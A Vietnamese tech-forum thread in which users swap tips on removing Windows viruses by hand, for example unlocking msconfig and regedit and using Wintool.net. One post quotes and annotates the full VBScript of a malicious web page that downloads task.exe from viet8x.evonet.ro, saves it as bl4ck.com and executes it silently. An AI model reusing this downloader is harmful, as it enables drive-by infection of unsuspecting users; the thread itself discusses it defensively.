Câu lạc bộ diệt virus bằng tay !!!!

Trần Ngọc Lân
(funbacon)

New Member
Dạo này sắp lắp mạng lại đang rỗi !!!anh em yêu con PC của mình xem có con virus nào hay hay up lên tôi diệt thử !!!!

Cám ơn trc' nhé !!!!
 
tự mà vào mấy trang sex và crack mà lấy ...
 
khổ wa' mấy con đó thi` tôi diệt rôi` toàn mấy con cấm regedit,taskmanager,msconfig cũ rik

để khi lao` rỗi post bài diệt mấy con đó cho coi !!!!
 
mấy con đó được diệt rồi !!! Mấy con của Vn làm ra hay của bọn china làm ấy thì bọn norton ko bit' (ko phổ biến nhưng ra hàng net ko có deepfreeze thì nhìu lắm) thì mới cần diệt tay. VD như con ravmone hay cai' con bjuv j` j` do' tên dai` loàng ngoằng (tên file no' tạo ra trong sytem của mình) em diệt no' được bằng tay mà chỉ cần dung` wintool.net (phần mềm)
 
Đấy là anh bảo, những cái đó chú làm tay được thì nếu chú thích thì chú làm 1 chương trình diệt virus, khi đã biết cách diệt manually thế nào rồi thì làm 1 chương trình diệt virus cũng đơn giản, có khi chỉ cần từ vài chục ---> vài trăm dòng code.
 
Dạ đúng thê' chính thế em mới muốn bit' thêm mấy con virus mới để diệt
 
Oạch, có ai biết cách diệt cái con Virus W32.RontobkroBY.Worm ko ? Vào topic này mấy lần toàn bị tự tắt IE (kể cả Firefox) (hình như con này chống chỉ định với chữ Virus ), nhờ ông bạn PM cho cái BKAV mới nhất nhưng mà cái trình này nó ko diệt được hết
 
ko bít có phải tại virus ko nhưng máy em ko vào đc msconfig :D cứ vào là chưa kịp ấn gì nó đã biến mất :D
 
Ngô Duy Biên đã viết:
ko bít có phải tại virus ko nhưng máy em ko vào đc msconfig :D cứ vào là chưa kịp ấn gì nó đã biến mất :D
em thử tìm msconfig.exe, rename nó rồi chạy thử xem, nếu work tức là bị virus rồi :)
 
hơ hơ :D nó chạy ầm ầm anh ạ :D em vừa cài WMP11 bị lỗi mà ko xóa đc :D có lẽ đằng nào cũng phải cài lại win :p
 
Có ai biết loại spyware hay ẩn trong process atmclk với cả winlogon ko ? con này ko thể nào diệt được
 
Ngô Duy Biên đã viết:
ko bít có phải tại virus ko nhưng máy em ko vào đc msconfig :D cứ vào là chưa kịp ấn gì nó đã biến mất :D

cậu có vào Run được ko ??? nếu dùng được lệnh run gõ gpedit.msc chịu khó tìm trong đó có phần unlock cho msconfig !!! Mà theo KN của tôi thi` nên dung` wintool.net co' tik hợp sẵn msconfig,regedit mạnh hơn nhiều so với những thứ có sẵn của Win

còn nếu ko vào run được tải cái Wintool.net xuống mà dùng
 
Nguyễn Duy đã viết:
Có ai biết loại spyware hay ẩn trong process atmclk với cả winlogon ko ? con này ko thể nào diệt được

cái này tớ ko rõ nữa nhưng bây giờ ngòai hng` net hay có cai' con virus no' tạo ra các app có icon là của 1 folder tên là tên folder chứa no'. Nếu đúng là con bạn noi' trước hết phải có 1 wintool.net + wincof (tìm trên google) bạn cài vào máy .Con virus này tạo ra mấy file chạy đươi' quyền user nhưng cũng ko tắt được bằng taskmanager nên dùng Wintool để tắt no' đi (win tool tương tự như 1 task manager +msconfig + regedit ) +bỏ chế độ startup của con virus đó (no' con` co' 1 cai' empty.pif ở trong start/program file/startup nhớ xóa cái đáy đi dùng wintool cậu run gpedit.msc để unlock folder option + run (vì con virus lock lại mà ) cuối cùng unlock cho regedit bằng winconf .Luc' này con virus đã ko còn chạy trên máy cậu nữa . Cậu search các file*.exe rồi xem file nào có icon folder xóa hết nó đi (nhớ search cả hide folder !!!)
Khi đó là cậu đã diệt được mối họa rồi. Ngoài ra cậu còn cần rò theo regedit của Wintool mà xóa cái dòng reg của con virus trong registry để khi bật máy nó ko báo lỗi open file .Thế là xong !!!
 
Nguyễn Thành Lam đã viết:
Oạch, có ai biết cách diệt cái con Virus W32.RontobkroBY.Worm ko ? Vào topic này mấy lần toàn bị tự tắt IE (kể cả Firefox) (hình như con này chống chỉ định với chữ Virus ), nhờ ông bạn PM cho cái BKAV mới nhất nhưng mà cái trình này nó ko diệt được hết
Cái này cứ bitdefender hay là BKAV hoặc D32 là thịt ngon:|
 
ai có tài liệu hướng dẫn diệt virus bằng tay không send em với mấy vụ dùng trojan thì biết chút xíu chứ diệt thì mù tịt
 
hê hê, đúng là dân ngoài nghề có khác, em lại tưởng các bác tính rút dép ra đập :D
 
Em có con này cho anh Lân này http://viet8x.evonet.ro hôm nay có thằng nó gửi cho cái này,lại còn there's nothing impossible 'cause impossible is i m possible,nghe hay hay click thử thì thấy you're welcome . Nghi ngờ view-source thử thì thấy ối giời

Mã:
on error resume next
    dl = "http://viet8x.evonet.ro/task.exe" //định down cái ni về à :-?
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4 //tách string để tránh bị phát hiện hả :-?
    str5=str1 //gán vớ gán vẩn
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1) // save lại à :-?
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0 //chạy à??
Có vẻ nó down task.exe về rồi save thành bl4ck.com rồi chạy.Nhưng mà firefox ko hỗ trợ vbscript :)) :)) :)) -> chả sao cả. Nhưng nếu dùng IE thì sao?Anh Lân thử nghịch con này xem,hình như nhiều thằng bị rồi,vừa xem xong cái script của nó thì thấy ba bốn thằng gửi.
 
Chỉnh sửa lần cuối:
Trần Ngọc Lân đã viết:
Dạo này sắp lắp mạng lại đang rỗi !!!anh em yêu con PC của mình xem có con virus nào hay hay up lên tôi diệt thử !!!!

Cám ơn trc' nhé !!!!


:) diệt bằng tay, chịu khó đi diệt mấy con hoẵng (hoax) ấy, bây giờ trên mạng nhiều vô số kể, diệt không hết, diệt mỏi tay thì thôi :D
 
Back
Bên trên